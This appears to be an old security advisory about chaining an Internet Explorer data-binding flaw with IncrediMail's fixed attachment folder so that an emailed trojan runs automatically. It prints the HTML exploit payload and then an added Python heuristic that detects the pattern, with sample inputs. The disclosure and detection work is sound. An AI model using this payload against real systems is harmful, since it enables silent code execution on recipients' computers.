MSIE vulnerability exploitable with IncrediMail

Hi,

	A Microsoft Internet Explorer vulnerability was found by GreyMagic
(http://security.greymagic.com/adv/gm001-ie/). With IncrediMail, it's
possible to gain remote access to a computer.

	IncrediMail automatically saves email attachments in this directory
(on Windows 2000 Professional):
C:\Program Files\IncrediMail\Data\Identities\{42D00B20-479C-11d4-9706-00105A40931C}\Message Store\Attachments

	So if you send an HTML email with the GreyMagic vulnerability and a
trojan as an attachment, it will be saved in this directory.

The HTML mail contains this code:

 <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
    <security>
        <exploit>
            <![CDATA[
            <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="C:/Program Files/IncrediMail/Data/Identities/{42D00B20-479C-11d4-9706-00105A40931C}/Message Store/Attachments/trojan.exe"></object>
            ]]>
        </exploit>
    </security>
</xml> 	

	So the trojan is executed automatically.


Eric DETOISIEN
Consultant Sécurité
GLOBAL SECURE
Tel. : 01-44-70-48-02
Fax. : 01-44-70-48-49 
Web  : http://www.global-secure.fr
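
A mail-gateway check for the pattern described in this message, as an added example that is not part of the original post: it flags HTML where an element is data-bound with dataformatas="html" to an XML data island holding an <object> whose codebase is a local path. The function names, both samples and the {GUID} placeholder are constructed for illustration.

```python
import re

# Constructed samples (not captured mail). {GUID} stands in for the identity folder.
SAMPLE_SUSPICIOUS = '''<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec"><security><exploit><![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111"
 codebase="C:/Program Files/IncrediMail/Data/Identities/{GUID}/Message Store/Attachments/sample.exe"></object>
]]></exploit></security></xml>'''
SAMPLE_BENIGN = '''<span datasrc="#oData" datafld="note" dataformatas="html"></span>
<xml id="oData"><r><note><![CDATA[<b>hello</b>]]></note></r></xml>'''

# Attribute value in double quotes, single quotes, or unquoted.
_ATTR = r'''\b%s\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))'''
# Codebase values that resolve on the recipient's machine: drive path, file: URL, UNC.
_LOCAL = re.compile(r'^(?:[a-z]:[\\/]|file:|\\\\)', re.I)

def _attr(tag, name):
    """Return the value of attribute `name` in the raw tag text, or None."""
    m = re.search(_ATTR % re.escape(name), tag, re.I)
    return next((g for g in m.groups() if g is not None), None) if m else None

def find_local_codebase_islands(html):
    """Return (island_id, codebase) pairs for XML data islands that are rendered
    as HTML through data binding and carry an <object> with a local codebase."""
    # Step 1: ids of data sources bound with dataformatas="html".
    bound = set()
    for tag in re.findall(r'<[a-z][^>]*\bdatasrc\b[^>]*>', html, re.I):
        src = _attr(tag, 'datasrc') or ''
        if (_attr(tag, 'dataformatas') or '').lower() == 'html' and src.startswith('#'):
            bound.add(src[1:].lower())
    findings = []
    # Step 2: XML data islands whose id is one of those bound sources.
    for m in re.finditer(r'(<xml\b[^>]*>)(.*?)</xml\s*>', html, re.I | re.S):
        island_id = _attr(m.group(1), 'id') or ''
        if island_id.lower() not in bound:
            continue
        # Step 3: <object> tags inside the island whose codebase is a local path.
        for obj in re.findall(r'<object\b[^>]*>', m.group(2), re.I):
            codebase = (_attr(obj, 'codebase') or '').strip()
            if _LOCAL.match(codebase):
                findings.append((island_id, codebase))
    return findings

if __name__ == '__main__':
    for name, body in (('suspicious', SAMPLE_SUSPICIOUS), ('benign', SAMPLE_BENIGN)):
        print(name, find_local_codebase_islands(body))
```

This is a heuristic over the raw HTML part of a message, so an empty list only means this specific pattern was not found.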
